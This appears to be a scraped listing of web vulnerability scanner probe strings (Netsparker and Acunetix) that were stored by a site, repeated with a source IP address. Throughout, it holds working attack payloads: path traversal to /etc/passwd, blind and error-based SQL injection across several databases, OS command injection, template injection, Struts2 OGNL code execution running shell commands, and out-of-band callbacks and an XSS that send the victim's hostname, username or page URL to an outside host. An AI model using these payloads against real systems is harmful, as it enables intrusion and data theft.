/../../../../../../../../../../etc/httpd/logs/error.log |
|
|
[php]print(int)0xFFF9999-23042;[/php] |
|
|
http://lzwjvpavdctiwx9tbpgoav6baemnqmqlkq3mxqlokqh.r87.me/p/ |
|
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(102)||chr(45)||chr(49)||chr(97)||chr(113)||chr(99)||chr(117)||chr(50)||chr(120)||chr(106)||chr(53)||chr(121)||chr(97)||chr(48)||chr(97)||chr(116)||chr(52)||chr(120)||chr(53)||chr(98)||chr(99)||chr(52)||chr(118)||chr(103)||chr(99)||chr(120)||chr(48)||chr(121)||chr(105)||chr(117)||chr(97)||chr(98)||chr(105)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||' |
|
|
/../../../../../../../../../../etc/httpd/logs/access.log |
|
|
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdcocae5lo_enhaqt6xqhwku4axtsrpqy'+'4y8.r87.me')exec sp_executesql @r-- |
|
|
....//....//....//....//....//....//....//....//....//....//....//etc/passwd |
|
netsparker(0x06E49F); |
|
|
|
|
|
netsparker(0x06E4A0); |
|
|
|
208.100.0.117 |
|
ns:netsparker056650=vuln |
|
|
|
|
|
ns:netsparker056650=vuln |
|
|
|
208.100.0.117 |
|
Content-Type:text/html
ns(0x06E67B) |
|
|
|
|
|
Content-Type:text/html
ns(0x06E67E) |
|
|
|
208.100.0.117 |
|
ns:netsparker056650=vuln |
|
|
|
|
|
ns:netsparker056650=vuln |
|
|
|
208.100.0.117 |
|
netsparker(0x06E48B) |
|
|
|
|
|
netsparker(0x06E48C) |
|
|
|
208.100.0.117 |
|
nslookup lzwjvpavdchafquet-qw2mbjtlwiho7zfh0k2e-q^kf4.r87.me&'\"`0&nslookup lzwjvpavdchafquet-qw2mbjtlwiho7zfh0k2e-q^kf4.r87.me&`' |
|
|
|
208.100.0.117 |
|
nslookup lzwjvpavdcsbwg3oppywzy1az1rlpizptwv5o1_c^joo.r87.me&'\"`0&nslookup lzwjvpavdcsbwg3oppywzy1az1rlpizptwv5o1_c^joo.r87.me&`' |
|
|
|
|
|
!(()&&!|*|*| |
|
|
|
1 |
|
"& nslookup lzwjvpavdcflx9txu2pdo7fnbs9ydkx-vszvh3nf^gxs.r87.me&'\"`0&nslookup lzwjvpavdcflx9txu2pdo7fnbs9ydkx-vszvh3nf^gxs.r87.me&`' |
|
|
|
208.100.0.117 |
|
"& nslookup lzwjvpavdcviaxvhsvpifjwhva00niirxufnn4mh^gjm.r87.me&'\"`0&nslookup lzwjvpavdcviaxvhsvpifjwhva00niirxufnn4mh^gjm.r87.me&`' |
|
|
|
|
|
"& ping -n 25 127.0.0.1 & |
|
|
|
|
|
"& ping -n 25 127.0.0.1 & |
|
|
|
208.100.0.117 |
|
"& SET /A 0xFFF9999-54790 & |
|
|
|
208.100.0.117 |
|
"& SET /A 0xFFF9999-63793 & |
|
|
|
|
|
"&nslookup "lzwjvpavdc6hll0cx_kdecnqm93vhmhhxetnat9n""a4k.r87.me" |
|
|
|
208.100.0.117 |
|
"&nslookup "lzwjvpavdcshqkm3v7qteggduuvx9yggsooyggif""zlq.r87.me" |
|
|
|
|
|
"&ping -w 25 127.0.0.1 &" |
|
|
|
|
|
"&ping -w 25 127.0.0.1 &" |
|
|
|
208.100.0.117 |
|
"+createobject("WScript.Shell").exec("nslookup lzwjvpavdc044xwzfmzzhzgvc-dsgh6dwdad3kyw" & "y30.r87.me").StdOut.ReadAll+" |
|
|
|
|
|
"+createobject("WScript.Shell").exec("nslookup lzwjvpavdchg9lo23y3qukrktqikmknj9kh4ulxi" & "bb0.r87.me").StdOut.ReadAll+" |
|
|
|
208.100.0.117 |
|
"+gethostbyname(lc 'lzwjvpavdcplpuuwuokgifls0jhrw5nmdrfxwzwk'.'qtc.r87.me')+" |
|
|
|
208.100.0.117 |
|
"+gethostbyname(lc 'lzwjvpavdcvric8bzifvtwz2sg1y02ntz86yu0zl'.'ate.r87.me')+" |
|
|
|
|
|
"+gethostbyname(trim('lzwjvpavdcdjsd-jajsj5fyh9ykuxu9fuynh_dn4'.'68c.r87.me'))+" |
|
|
|
208.100.0.117 |
|
"+gethostbyname(trim('lzwjvpavdc_-j5yvfog5ju43tbhs9_0wrtlmgyfr'.'fzk.r87.me'))+" |
|
|
|
|
|
"+netsparker(0x06E44E)+" |
|
|
|
|
|
"+netsparker(0x06E44F)+" |
|
|
|
208.100.0.117 |
|
"+print localtime()*0+0xFFF9999-46752+" |
|
|
|
|
|
"+print localtime()*0+0xFFF9999-49711+" |
|
|
|
208.100.0.117 |
|
"+print(int)0xFFF9999-28493+" |
|
|
|
|
|
"+print(int)0xFFF9999-34449+" |
|
|
|
208.100.0.117 |
|
"+response.write(268409241-27457)+" |
|
|
|
|
|
"+response.write(268409241-28028)+" |
|
|
|
208.100.0.117 |
|
"+response.write(9658478*9160158)+" |
|
|
|
1 |
|
";l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdcf1ko1uk6jvofelry9ptbub0vx8zjqa"+"qno.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
|
|
|
";l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdchnrl1e7xbwejwoj-qzhigfch827p53"+"xya.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
|
208.100.0.117 |
|
";print(md5(acunetix_wvs_security_test));$a=" |
|
|
|
1 |
|
#{28275*28275-(93177)} |
|
|
|
208.100.0.117 |
|
#{28275*28275-(93630)} |
|
|
|
|
|
$(nslookup lRku9340) |
|
|
|
1 |
|
${28275*28275-(60358)} |
|
|
|
208.100.0.117 |
|
${28275*28275-(91284)} |
|
|
|
|
|
${9999795+9999416} |
|
|
|
1 |
|
${@print(md5(acunetix_wvs_security_test))} |
|
|
|
1 |
|
${@print(md5(acunetix_wvs_security_test))}\ |
|
|
|
1 |
|
%22%2bnetsparker(0x06E596)%2b%22 |
|
|
|
|
|
%22%2bnetsparker(0x06E597)%2b%22 |
|
|
|
208.100.0.117 |
|
%27 |
|
|
|
208.100.0.117 |
|
%27 |
|
|
|
|
|
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x06E166%29%3C%2FscRipt%3E |
|
|
|
|
|
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x06E167%29%3C%2FscRipt%3E |
|
|
|
208.100.0.117 |
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
|
|
|
|
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
|
|
|
208.100.0.117 |
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
|
|
|
|
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
|
|
|
208.100.0.117 |
|
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-65006)} |
|
|
|
208.100.0.117 |
|
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-89017)} |
|
|
|
|
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "lzwjvpavdc9eavisrfxqqbkadjpij2ne8xddphxy"ahu.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
|
|
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "lzwjvpavdcppsv2y5v4udetqnfqqhjwrteshe9t5"rtc.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
|
208.100.0.117 |
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."lzwjvpavdc5xyyihc3xtjnvxgdxdnuatrjdlhi_h""kv0.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
|
208.100.0.117 |
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."lzwjvpavdcb4-jerd2fphvowjpu8accddkrdqrce""se8.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
|
|
|
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='2776').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} |
|
|
|
|
|
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='42680').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} |
|
|
|
208.100.0.117 |
|
& nslookup lzwjvpavdc73nn6dpw6-cke0xtuxuq7-3cqhg4ib^3as.r87.me&'\"`0&nslookup lzwjvpavdc73nn6dpw6-cke0xtuxuq7-3cqhg4ib^3as.r87.me&`' |
|
|
|
208.100.0.117 |
|
& nslookup lzwjvpavdckigzw8c8_q8rymdiatc7jxpufy0ehe^1wq.r87.me&'\"`0&nslookup lzwjvpavdckigzw8c8_q8rymdiatc7jxpufy0ehe^1wq.r87.me&`' |
|
|
|
|
|
& ping -n 25 127.0.0.1 & |
|
|
|
|
|
& ping -n 25 127.0.0.1 & |
|
|
|
208.100.0.117 |
|
& SET /A 0xFFF9999-2318 & |
|
|
|
208.100.0.117 |
|
& SET /A 0xFFF9999-62339 & |
|
|
|
|
|
'+netsparker(0x06E4CF)+' |
|
|
|
|
|
'+netsparker(0x06E4D0)+' |
|
|
|
208.100.0.117 |
|
',netsparker(0x06E477),' |
|
|
|
|
|
',netsparker(0x06E478),' |
|
|
|
208.100.0.117 |
|
&nslookup "lzwjvpavdctipdn8nlyt3obhgfxaduowdiuvmduk""jai.r87.me" |
|
|
|
208.100.0.117 |
|
&nslookup "lzwjvpavdc_skra8mzucvwqtugjodtjywxtjsfog""bse.r87.me" |
|
|
|
|
|
&nslookup ROWs9E9d&'\"`0&nslookup ROWs9E9d&`' |
|
|
|
1 |
|
&ping -w 25 127.0.0.1 & |
|
|
|
|
|
&ping -w 25 127.0.0.1 & |
|
|
|
208.100.0.117 |
|
&thisdoesntexists; |
|
|
|
|
|
&thisdoesntexists; |
|
|
|
208.100.0.117 |
|
' |
|
|
|
208.100.0.117 |
|
' |
|
|
|
208.100.0.117 |
|
' WAITFOR DELAY '0:0:25'-- |
|
|
|
|
|
' WAITFOR DELAY '0:0:25'-- |
|
|
|
208.100.0.117 |
|
'" |
|
|
|
1 |
|
'" ns=netsparker(0x06E197) |
|
|
|
|
|
'" ns=netsparker(0x06E199) |
|
|
|
208.100.0.117 |
|
'"() |
|
|
|
1 |
|
'& nslookup lzwjvpavdckgegviakml9ttgaxmpc-2mfxnmo0tl^tlu.r87.me&'\"`0&nslookup lzwjvpavdckgegviakml9ttgaxmpc-2mfxnmo0tl^tlu.r87.me&`' |
|
|
|
|
|
'& nslookup lzwjvpavdcvaltrr-dwfwmaqe1n3ufquomqvbrgl^yeg.r87.me&'\"`0&nslookup lzwjvpavdcvaltrr-dwfwmaqe1n3ufquomqvbrgl^yeg.r87.me&`' |
|
|
|
208.100.0.117 |
|
'& ping -n 25 127.0.0.1 & |
|
|
|
|
|
'& ping -n 25 127.0.0.1 & |
|
|
|
208.100.0.117 |
|
'& SET /A 0xFFF9999-28462 & |
|
|
|
208.100.0.117 |
|
'& SET /A 0xFFF9999-60912 & |
|
|
|
|
|
'&nslookup "lzwjvpavdcfru0lbhs92grf2ti3lcu7r7gmoiaiu""sz0.r87.me" |
|
|
|
208.100.0.117 |
|
'&nslookup "lzwjvpavdco9fg-bdum_xzl8bhr76wf6njjt9apr""ekq.r87.me" |
|
|
|
|
|
'&ping -w 25 127.0.0.1 &' |
|
|
|
|
|
'&ping -w 25 127.0.0.1 &' |
|
|
|
208.100.0.117 |
|
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 |
|
|
|
|
|
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 |
|
|
|
208.100.0.117 |
|
') WAITFOR DELAY '0:0:25'-- |
|
|
|
|
|
') WAITFOR DELAY '0:0:25'-- |
|
|
|
208.100.0.117 |
|
')) WAITFOR DELAY '0:0:25'-- |
|
|
|
|
|
')) WAITFOR DELAY '0:0:25'-- |
|
|
|
208.100.0.117 |
|
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
|
|
|
|
|
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
|
|
|
208.100.0.117 |
|
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
|
|
|
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
|
208.100.0.117 |
|
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' |
|
|
|
|
|
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' |
|
|
|
208.100.0.117 |
|
'+gethostbyname(lc 'lzwjvpavdc2lmgg5yercghpevyyzstj68nio-stn'.'9au.r87.me')+' |
|
|
|
208.100.0.117 |
|
'+gethostbyname(lc 'lzwjvpavdcdnlobya7z3x3tfh2pxfu2yt5vqlpw-'.'9s4.r87.me')+' |
|
|
|
|
|
'+gethostbyname(trim('lzwjvpavdchzi8hldfirtcyr3hkq0zx0otmum3jq'.'14s.r87.me'))+' |
|
|
|
|
|
'+gethostbyname(trim('lzwjvpavdctuqnvve8aki2li-3mlnvyf8oydrw7b'.'udg.r87.me'))+' |
|
|
|
208.100.0.117 |
|
'+netsparker(0x06E433)+' |
|
|
|
|
|
'+netsparker(0x06E435)+' |
|
|
|
208.100.0.117 |
|
'+NSFTW+' |
|
|
|
208.100.0.117 |
|
'+NSFTW+' |
|
|
|
|
|
'+print localtime()*0+0xFFF9999-18161+' |
|
|
|
|
|
'+print localtime()*0+0xFFF9999-61674+' |
|
|
|
208.100.0.117 |
|
'+print(int)0xFFF9999-86061+' |
|
|
|
208.100.0.117 |
|
'+print(int)0xFFF9999-93932+' |
|
|
|
|
|
'+response.write(9658478*9160158)+' |
|
|
|
1 |
|
';l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdcmip9-jwhzsdcb0zsyyfcyz5avg4hod"+"-bc.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
|
208.100.0.117 |
|
';l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdco5csm27mcaxh6dernd57h3r-guwyf8"+"vcg.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
|
|
|
';print(md5(acunetix_wvs_security_test));$a=' |
|
|
|
1 |
|
'> |
|
|
|
|
|
'> |
|
|
|
208.100.0.117 |
|
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' |
|
|
|
|
|
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' |
|
|
|
208.100.0.117 |
|
'{${gethostbyname(trim('lzwjvpavdcpvf3tvyrnzipxdyz7qvdekmfcytf56'.'iig.r87.me'))}}' |
|
|
|
208.100.0.117 |
|
'{${gethostbyname(trim('lzwjvpavdcyeyawx6ybh6tctc1keomu-ouappzz5'.'a4e.r87.me'))}}' |
|
|
|
|
|
'{${print(int)0xFFF9999-33838}}' |
|
|
|
|
|
'{${print(int)0xFFF9999-4092}}' |
|
|
|
208.100.0.117 |
|
'||(SELECT dblink_connect('host=lzwjvpavdcrra82ons7o2o_ecuo8ikai11td8kzo'||'dxw.r87.me user=a password=a connect_timeout=2'))||' |
|
|
|
208.100.0.117 |
|
'||(SELECT dblink_connect('host=lzwjvpavdcx0aecsup4zkej9ew8z2r5ynk4y1eri'||'jas.r87.me user=a password=a connect_timeout=2'))||' |
|
|
|
|
|
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' |
|
|
|
|
|
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' |
|
|
|
208.100.0.117 |
|
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' |
|
|
|
|
|
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' |
|
|
|
208.100.0.117 |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdccspp-p2ccvrgdskh7i4qzztnh4hu3c'||'91e.r87.me') from DUAL))||' |
|
|
|
|
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdcerqbkv9qqsjgk3d1nnwpsz0au3yj0x'||'vko.r87.me') from DUAL))||' |
|
|
|
208.100.0.117 |
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(114)||chr(106)||chr(115)||chr(100)||chr(55)||chr(109)||chr(110)||chr(111)||chr(100)||chr(117)||chr(97)||chr(115)||chr(57)||chr(112)||chr(57)||chr(111)||chr(109)||chr(120)||chr(117)||chr(114)||chr(106)||chr(101)||chr(104)||chr(49)||chr(105)||chr(114)||chr(106)||chr(48)||chr(118)||chr(53)||chr(120)||chr(107)||chr(117)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||' |
|
|
|
|
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(53)||chr(54)||chr(53)||chr(48)||chr(51)||chr(56)||chr(100)||chr(45)||chr(105)||chr(101)||chr(95)||chr(102)||chr(97)||chr(108)||chr(112)||chr(107)||chr(120)||chr(118)||chr(100)||chr(116)||chr(100)||chr(114)||chr(115)||chr(115)||chr(99)||chr(120)||chr(113)||chr(98)||chr(104)||chr(117)||chr(116)||chr(112)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||' |
|
|
|
208.100.0.117 |
|
((select sleep(25)))a-- 1 |
|
|
|
|
|
((select sleep(25)))a-- 1 |
|
|
|
208.100.0.117 |
|
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) |
|
|
|
|
|
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) |
|
|
|
208.100.0.117 |
|
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) |
|
|
|
|
|
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) |
|
|
|
208.100.0.117 |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdc-jab-vs7hztkcanfwdqg7cttigeuef'||'coi.r87.me') from DUAL)))) |
|
|
|
208.100.0.117 |
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdcfkulprjcp9xpvfo8uwuww022ooqq_a'||'ebu.r87.me') from DUAL)))) |
|
|
|
|
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(114)||chr(106)||chr(52)||chr(105)||chr(107)||chr(116)||chr(108)||chr(104)||chr(120)||chr(119)||chr(114)||chr(51)||chr(120)||chr(108)||chr(106)||chr(54)||chr(98)||chr(109)||chr(110)||chr(107)||chr(48)||chr(100)||chr(117)||chr(55)||chr(109)||chr(114)||chr(52)||chr(99)||chr(103)||chr(102)||chr(49)||chr(114)||chr(97)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)))) |
|
|
|
|
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(122)||chr(107)||chr(116)||chr(97)||chr(116)||chr(122)||chr(100)||chr(52)||chr(100)||chr(112)||chr(98)||chr(98)||chr(110)||chr(97)||chr(109)||chr(119)||chr(97)||chr(99)||chr(117)||chr(105)||chr(98)||chr(50)||chr(100)||chr(105)||chr(103)||chr(116)||chr(101)||chr(100)||chr(112)||chr(121)||chr(100)||chr(100)||chr(48)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)))) |
|
|
|
208.100.0.117 |
|
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
|
|
|
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
|
208.100.0.117 |
|
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) |
|
|
|
|
|
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) |
|
|
|
208.100.0.117 |
|
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) |
|
|
|
|
|
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) |
|
|
|
208.100.0.117 |
|
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
|
|
|
|
|
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
|
|
|
208.100.0.117 |
|
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) |
|
|
|
|
|
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) |
|
|
|
208.100.0.117 |
|
(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdccfbdfcpxcuq6e447vuusy-6_zxqod_'||'rem.r87.me') from DUAL) |
|
|
|
|
|
(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdcls9fwhl23w5snmagzd9hm1z7yhwval'||'kfc.r87.me') from DUAL) |
|
|
|
208.100.0.117 |
|
(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(109)||chr(54)||chr(106)||chr(116)||chr(101)||chr(115)||chr(109)||chr(103)||chr(48)||chr(49)||chr(115)||chr(104)||chr(120)||chr(55)||chr(98)||chr(118)||chr(121)||chr(105)||chr(102)||chr(97)||chr(111)||chr(56)||chr(102)||chr(100)||chr(48)||chr(110)||chr(121)||chr(100)||chr(108)||chr(111)||chr(111)||chr(110)||chr(107)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL) |
|
|
|
|
|
(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(120)||chr(97)||chr(52)||chr(112)||chr(51)||chr(105)||chr(99)||chr(122)||chr(109)||chr(119)||chr(120)||chr(112)||chr(118)||chr(111)||chr(122)||chr(110)||chr(119)||chr(112)||chr(119)||chr(50)||chr(106)||chr(117)||chr(113)||chr(99)||chr(117)||chr(114)||chr(101)||chr(118)||chr(99)||chr(103)||chr(112)||chr(110)||chr(97)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL) |
|
|
|
208.100.0.117 |
|
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ |
|
|
|
1 |
|
) |
|
|
|
1 |
|
))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) |
|
|
|
1 |
|
*/netsparker(0x06E41C);/* |
|
|
|
|
|
*/netsparker(0x06E41D);/* |
|
|
|
208.100.0.117 |
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdcckq8qm6nkja60evymozag3zj9oqcpp" & "buw.r87.me").StdOut.ReadAll |
|
|
|
|
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdcigqzgevzi_uqeypregautimoj6-3ll" & "xxm.r87.me").StdOut.ReadAll |
|
|
|
208.100.0.117 |
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdcntvkhgz557dyf65on_r8ijiyypg1ev" & "tcy.r87.me").StdOut.ReadAll+ |
